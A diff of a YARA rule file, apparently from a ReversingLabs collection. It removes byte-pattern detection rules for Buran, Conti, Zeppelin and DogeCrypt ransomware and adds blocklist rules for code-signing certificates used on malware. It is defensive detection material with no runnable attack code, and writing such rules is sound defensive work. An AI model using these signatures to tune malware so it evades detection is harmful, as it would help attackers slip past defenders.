-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
-            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
-            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
-            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
-            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
-            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$decrypt_DesucryptKeyContainer_DogeCrypt = {
-            68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 55 ?? 83 7D ?? ?? 8B 5D ?? 8B 35 ?? ?? ?? ?? 0F 43 D3 A1 ?? ?? ?? ?? 8B
-            4D ?? 2B C6 89 75 ?? 3B C8 77 ?? 83 3D ?? ?? ?? ?? ?? 8D 3C 31 8D 04 09 89 3D ?? ??
-            ?? ?? 50 8B 45 ?? BE ?? ?? ?? ?? 0F 43 35 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 C6 45 ?? ?? FF 75 ?? 51 B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ??
-            8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 0F 43
-            05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 68 ?? ??
-            ?? ?? 56 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 8D 45 ?? 6A ??
-            50 C6 07 ?? FF 35 ?? ?? ?? ?? 57 56 FF D3 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
-            ?? ?? 57 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
-            ?? ?? EB ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C3 E8 ?? ?? ?? ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC HERMES" and pe.signatures [ i ] . serial == "11:21:1e:ea:9d:0d:1d:1a:32:5b:5e:ae:1b:2b:19:51:12:0f" and 1460147212 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "0890bf55-ebd5-5b68-8047-14692a5f1ae7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17052-L17068"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8e1e3e7d002ce084600c5444dc9b0bad8771370cb7919a3bb5ebc899040e4cf2"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $decrypt_DesucryptKeyContainer_DogeCrypt ) and ( $find_files_DogeCrypt ) and ( all of ( $encrypt_files_DogeCrypt_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "17:2f:ea:8c:b0:6f:fc:ed:6b:fa:c7:f2:f6:b7:77:54" and 1467936000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Buran : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Buran ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2a36a8b-5c21-5c31-994d-b424c038dd21"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "5c35c73e-e4f6-5707-ad91-1db7c0a0ec81"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Buran.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5606e0acecd99ccf2feaa995353211302903a09bb2c4ec65903566215e2d5ca4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17070-L17086"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d232923ed962fbf4a9a30890778c2380d6c6967a693c6f77c2f558bb4347e60e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Buran"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            89 5D ?? 89 5D ?? 88 8D ?? ?? ?? ?? 88 95 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33
-            C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ??
-            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84
-            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
-            74 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 33 C9 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59
-            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9
-        }
-		$encrypt_files = {
-            53 56 57 55 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3F ?? 74 ?? 8B 07 89
-            C6 33 C0 89 07 FF D6 83 3F ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 33 C0 89
-            43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 7B ?? 85 FF 74
-            ?? 8B C7 E8 ?? ?? ?? ?? 8B 6B ?? 8B 75 ?? 3B 75 ?? 74 ?? 85 F6 74 ?? 56 E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? FF 53 ?? 80 7B ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 3B
-            ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B 03 8B F0 8B FB B9 ?? ?? ?? ?? F3 A5 E9 ?? ?? ?? ?? 5D 5F 5E 5B C3 A3
-        }
-		$remote_connection_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 50 83 C4 ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
-            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 BE ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? 6A ?? 8B 45 ?? E8
-        }
-		$remote_connection_p2 = {
-            50 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 8B 70 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 56 8B 45
-            ?? 8B 40 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 EB ?? 83 7D ?? ?? 74 ?? 8D 95 ??
-            ?? ?? ?? 8B 4D ?? 8B 45 ?? 8B 30 FF 56 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 8B 45 ?? 8B 30 FF 56 ?? 8B C3 8B 55 ?? 8B 52 ?? E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABDULKADIR SAHIN" and pe.signatures [ i ] . serial == "3e:e5:0b:b9:8f:ad:ca:2d:66:2a:09:20:e7:66:85:a2" and 1330041600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2009c47b-8a15-50fd-a229-5e34244ede1f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17088-L17104"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "22ad68974a1c6729da369c26372ba93c25ddf68df880580c727bf2d3ee2d3a86"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE6\\xB7\\x87\\xE6\\x99\\xBA" and pe.signatures [ i ] . serial == "21:bf:dd:b6:a6:64:35:d1:ad:ce:2c:eb:23:ed:7c:9a" and 1395297334 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Conti : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Conti ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "548b8836-83cb-560c-af5f-33bdb24d15ed"
-		date = "2020-12-14"
-		modified = "2020-12-14"
+		id = "b78e7f2b-8122-5df6-ad79-393db9e0498d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Conti.yara#L1-L74"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4f2b96c8eaf8d112a7bb60647db49616935a336396c705d39d5bb51dfd90c60b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17106-L17122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9a8d9acc87668a6fbd9fdd52b6ef69d18de8f19d8f3d3ca8eeb630c6e8c25c65"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Conti"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B D9 53 FF 15 ?? ?? ?? ?? 89 44 24 ??
-            8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 44
-            24 ?? B9 ?? ?? ?? ?? 53 BE ?? ?? ?? ?? 57 66 83 7C 43 ?? ?? 0F 45 F1 FF 15 ?? ?? ??
-            ?? 56 57 FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ??
-            8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B
-            CB E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B CE E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B CB E8 ?? ?? ?? ?? 8B F0 85 F6
-            74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 5A 8B C8 C6 01 ?? 41
-            83 EA ?? 75 ?? 83 48 ?? ?? 50 89 70 ?? A1 ?? ?? ?? ?? 52 6A ?? FF 70 ?? FF 15 ?? ??
-            ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? E8 ??
-            ?? ?? ?? 83 FF ?? 74 ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BB ?? ?? ?? ?? 8B F9 53 57 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 75 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? FF 74 B5 ?? 57 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 46 83 FE ?? 7C ?? 33 C0 40 EB ?? 85 C0 75 ?? 8B 35 ?? ?? ?? ?? BB ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 53 56 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 2B C6 D1 F8 74 ?? 85 C0 78 ?? 40 50 56 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 56 FF 15 ??
-            ?? ?? ?? 8B F0 85 F6 74 ?? 83 C6 ?? EB ?? 33 C0 5F 5E 5B C9 C3
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 83 EC ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB 53 FF 15 ?? ??
-            ?? ?? 8B F8 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 5E 56 68 ?? ?? ??
-            ?? 53 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53
-            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 53 53 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 4D ??
-            8B D7 FF 75 ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ??
-            8B 45 ?? B9 ?? ?? ?? ?? 83 48 ?? ?? 8B 45 ?? 8B 58 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74
-            ?? 53 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ??
-            ?? 8B CE E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 49 ?? E8 ?? ?? ?? ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B C9 C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jin Yuguang" and pe.signatures [ i ] . serial == "5b:1c:3f:7b:ba:a9:1c:a4:9b:06:a5:c1:00:4e:e5:be" and 1440643213 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "51e603bb-ef21-55e8-8f2b-94865f1213c9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17124-L17140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "07ce4d39af1e56fbbfa400cf139956826999043480f93c0fc43ed056f6420d7f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RocketMedia S.r.l." and pe.signatures [ i ] . serial == "0a:20:89" and 1050073884 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zeppelin : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zeppelin ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f5cf514d-4dd0-58b7-82d0-5cb516a139a3"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "170dae5a-ed7e-5f20-9ccd-94724e4b2084"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Zeppelin.yara#L1-L109"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8fb07e49d2ff9d497fb36a5d901748315ae519f5ef845d1a5ec6341d0eb1f68c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17142-L17158"
